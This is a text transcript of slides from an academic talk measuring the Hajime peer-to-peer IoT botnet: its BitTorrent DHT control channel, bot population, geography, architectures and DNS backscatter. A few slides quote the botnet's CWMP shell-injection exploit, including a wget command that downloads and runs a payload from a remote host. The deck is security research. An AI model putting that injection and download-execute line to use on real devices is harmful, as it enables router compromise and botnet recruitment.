measurement and analysis of hajime: a peer-to-peer iot botnet€¦ · time (20-minute bins)...
TRANSCRIPT
![Page 1: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/1.jpg)
Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet
University of Maryland
Stephen Herwig Katura Harvey George Hughey Richard Roberts Dave Levin
The Max Planck Institutefor Software Systems+
![Page 2: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/2.jpg)
Rise of IoT Botnets
HajimeResilient C&CTargets many CPU archesScanning behavior arch-specificContinuously deploys new exploits
![Page 3: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/3.jpg)
Talk Overview
Describe Hajime P2P networkOur measurement infrastructure
AnalyzeHeterogeneous botnet compositionImpact of three exploit deployments
Discuss Challenges of new, resilient botnets
![Page 4: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/4.jpg)
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
![Page 5: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/5.jpg)
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hostingfile named F
announce hash(F)
![Page 6: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/6.jpg)
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hosting hash(F)
Hostingfile named F
announce hash(F)
![Page 7: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/7.jpg)
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hosting hash(F)
Wants todownload F
Hostingfile named F
announce hash(F)
lookup hash(F)
Provides random subsets of current uploaders
![Page 8: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/8.jpg)
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hosting hash(F)
Wants todownload F
Hostingfile named F
announce hash(F)
lookup hash(F)
Provides random subsets of current uploaders
![Page 9: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/9.jpg)
Hajime’s P2P Network① Uses BitTorrent’s DHT to find other bots
Downloading
Hosting
lookup hash(F)
Hosting hash(F)
Randomsubset
announce hash(F)
![Page 10: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/10.jpg)
Hajime’s P2P Network① Uses BitTorrent’s DHT to find other bots
announce hash(F)
Date
File type
Architecture
MIPS little endianMIPS big endianARM v5ARM v6ARM v7
Once per day
.i – “infect”
.atk – “attack”
Every day, bots are announcing
their actions
and their devices’ architectures
Hajime’s design is primed for measurement!
![Page 11: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/11.jpg)
Hajime’s P2P Network② Fetch files directly from one another
Downloading
Hosting
lookup hash(F)
Hosting hash(F)
announce hash(F)
![Page 12: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/12.jpg)
Hajime’s P2P Network② Fetch files directly from one another
Downloading
Hosting
Keys provide long-lived identifiers
Request FileKey exchange
![Page 13: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/13.jpg)
Hajime’s P2P Network
② Fetch files directly from one another
Difficult to take down Hajime (without also taking down BitTorrent)
① Uses BitTorrent’s DHT to find other bots
Difficult to centrally monitor
Hajime is a resilient next step in IoT botnets
![Page 14: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/14.jpg)
Measuring Hajime’s P2P network① Exhaustively list all peers
lookup hash(F)
Hosting hash(F)
Randomsubset
![Page 15: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/15.jpg)
Measuring Hajime’s P2P network① Exhaustively list all peers
lookup hash(F)
Hosting hash(F)
![Page 16: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/16.jpg)
Measuring Hajime’s P2P network① Exhaustively list all peers
lookup hash(F)
Hosting hash(F)
![Page 17: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/17.jpg)
Measuring Hajime’s P2P network① Exhaustively list all peers
Every 16 minutes for 4 months5,404,045 total IP addresses found
i/mipseb/today
atk/arm7/today i/mipsel/tomorrow
atk/arm5/yesterday
![Page 18: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/18.jpg)
Measuring Hajime’s P2P network② Obtain each Hajime bot’s public key
10,536,174 total keys found
Key exchange
![Page 19: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/19.jpg)
Measuring Hajime’s P2P network② Obtain each Hajime bot’s public key
10,536,174 total keys found
Key exchange0
20K
40K
60K
80K
100K
120K
0 20K 40K 60K 80K 100K
Keys
IPs
IranMexicoChinaIndia
South KoreaUnited States
TurkeyRussia
Indonesia
NATs undercount bots based on IPs
![Page 20: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/20.jpg)
0
100K
200K
300K
400K
500K
600K
700K
800K
900K
0 100K 200K 300K 400K 500K 600K 700K 800K 900K
Keys
IPs
IranMexicoChinaIndia
South KoreaUnited States
TurkeyRussia
IndonesiaBrazil
Measuring Hajime’s P2P network② Obtain each Hajime bot’s public key
10,536,174 total keys found
Key exchange
IP reassignment overcounts bots based on IPs
![Page 21: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/21.jpg)
Datasets
5,404,045 unique IP addresses
DHT scans
10,536,174 unique keys
Key scans
47 modules34 .atk, 13 .i
Reverse eng
Jan 25, 2018 – Jun 1, 2018
All available at iot.cs.umd.edu
![Page 22: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/22.jpg)
Analysis Questions
How large is the botnet?Where are bots located?What devices makeup the botnet?
How do exploits change the botnet?How quickly does Hajime update itself?How does Hajime deploy new exploits?
Dynamics
Characteristics
![Page 23: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/23.jpg)
How big is Hajime?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
![Page 24: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/24.jpg)
How big is Hajime?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
Steady-state of ~40K bots
Peaks of 95K after Chimay-Red and GPON exploits
![Page 25: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/25.jpg)
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
Where are bots located?
![Page 26: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/26.jpg)
Where are bots located?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
![Page 27: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/27.jpg)
Where are bots located?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
The geographic makeup of IoT botnets can change rapidly
Chimay-Red Russia expanded500 → 6,000 hourly
![Page 28: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/28.jpg)
Where are bots located?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
The geographic makeup of IoT botnets can change rapidly
Chimay-Red Russia expanded500 → 6,000 hourly GPON Mostly affected
Mexico
![Page 29: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/29.jpg)
0K
10K
20K
30K
40K
50K
60K
70K
80K
90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
mipsebmipsel
arm7arm6arm5
What CPU architectures are most infected?
![Page 30: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/30.jpg)
0K
10K
20K
30K
40K
50K
60K
70K
80K
90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
mipsebmipsel
arm7arm6arm5
What CPU architectures are most infected?
Devices overwhelmingly run MIPS
74.2% of bot devices are MIPS big-endian (mipseb)
![Page 31: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/31.jpg)
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Brazil China Iran India Korea US Turkey Russia Mexico
How does CPU architecture vary by country?
0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
![Page 32: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/32.jpg)
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Brazil China Iran India Korea US Turkey Russia Mexico
How does CPU architecture vary by country?
0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
IoT botnets are highly heterogeneous across the world
After the introduction of the GPON vulnerability
![Page 33: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/33.jpg)
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Brazil China Iran India Korea US Turkey Russia Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?After the introduction of the GPON vulnerability
New vulnerabilities can lead to drastic changesin geography
![Page 34: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/34.jpg)
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?After the introduction of the GPON vulnerability
New vulnerabilities can lead to drastic changesin geography
![Page 35: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/35.jpg)
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?
MexicobeforeGPON
afterGPON
Mexico changed from primarily ARM to primarily MIPS
New vulnerabilities can lead to drastic changesin geography
![Page 36: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/36.jpg)
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?
MexicobeforeGPON
afterGPON
Mexico changed from primarily ARM to primarily MIPS
New vulnerabilities can lead to drastic changesin geography and composition
![Page 37: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/37.jpg)
What devices are infected?
DHT scans
Censys
![Page 38: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/38.jpg)
What devices are infected?
DHT scans
Censys
No device information on over 80%of bot IP addresses
Of those identifiable: 0.8% MikroTik day before Chimay-Red 80.3% day after
![Page 39: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/39.jpg)
How quickly does Hajimedisseminate module updates?
% of mipseb bots hosting or looking up each file version
0
20
40
60
80
100
03-15 03-29 04-12 04-26 05-10 05-24
% o
f bot
s pe
r.i
vers
ion
Time (20-minute bins)
0
20
40
60
80
100
% o
f bot
s pe
rat
k ve
rsio
n
![Page 40: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/40.jpg)
How quickly does Hajimedisseminate module updates?
% of mipseb bots hosting or looking up each file version
0
20
40
60
80
100
03-15 03-29 04-12 04-26 05-10 05-24
% o
f bot
s pe
r.i
vers
ion
Time (20-minute bins)
0
20
40
60
80
100
% o
f bot
s pe
rat
k ve
rsio
n
Quick
![Page 41: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/41.jpg)
How quickly does Hajimedisseminate module updates?
0
20
40
60
80
100
03-15 03-29 04-12 04-26 05-10 05-24
% o
f bot
s pe
r.i
vers
ion
Time (20-minute bins)
0
20
40
60
80
100
% o
f bot
s pe
rat
k ve
rsio
n% of mipseb bots hosting or looking up each file version
Quick
Inconsistent
A new . i clears old atks.
![Page 42: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/42.jpg)
Hajime’s CWMP exploit
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
![Page 43: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/43.jpg)
Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
“This is a domain name”
![Page 44: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/44.jpg)
Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
Local DNSResolver
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
“What’s this TLD?”
![Page 45: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/45.jpg)
Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
Local DNSResolver
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
D-root
NXDOMAINNXDOMAIN
“What’s this TLD?”
![Page 46: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/46.jpg)
What we learn from D-root
Local DNSResolver
D-root
✔✔
DNS Backscatter
A sample of attack attempts worldwide
But only to non-vulnerable hosts
![Page 47: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/47.jpg)
DNS Backscatter: Mirai vs. Hajime
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
![Page 48: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/48.jpg)
DNS Backscatter: Mirai vs. Hajime
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
Mirai
![Page 49: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/49.jpg)
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
HajimeMirai
config update.i.mipseb update
atk.mipseb update.i.mipsel update
atk.mipsel update
DNS Backscatter: Mirai vs. Hajime
![Page 50: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/50.jpg)
Where is Hajime from?
Initial (test?) CWMP attack came from the Netherlands
47 modules34 .atk, 13 .i
Reverse eng
Hajime blacklists the same IP address as Mirai, plus: 77.247.0.0/16 85.159.0.0/16 109.201.0.0/16
These have one ISP in common: NFOrce Entertainment (located in the Netherlands)
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
HajimeMirai
config update.i.mipseb update
atk.mipseb update.i.mipsel update
atk.mipsel update
![Page 51: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/51.jpg)
Also covered in the paper
- Details on bot internals and exploits
- Analysis of bot churn
- Details on device fingerprinting
- Country-level analysis of CWMP DNS backscatter
![Page 52: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet€¦ · Time (20-minute bins) atk.mipseb update.i.mipseb update. How big is Hajime? 0K 10K 20K 30K 40K 50K 60K 70K 80K](https://reader034.vdocuments.site/reader034/viewer/2022042212/5eb51048321c430e196bbe19/html5/thumbnails/52.jpg)
Measuring and analyzing HajimeDHT scans D-root
IoT botnets have highly heterogeneous architectures
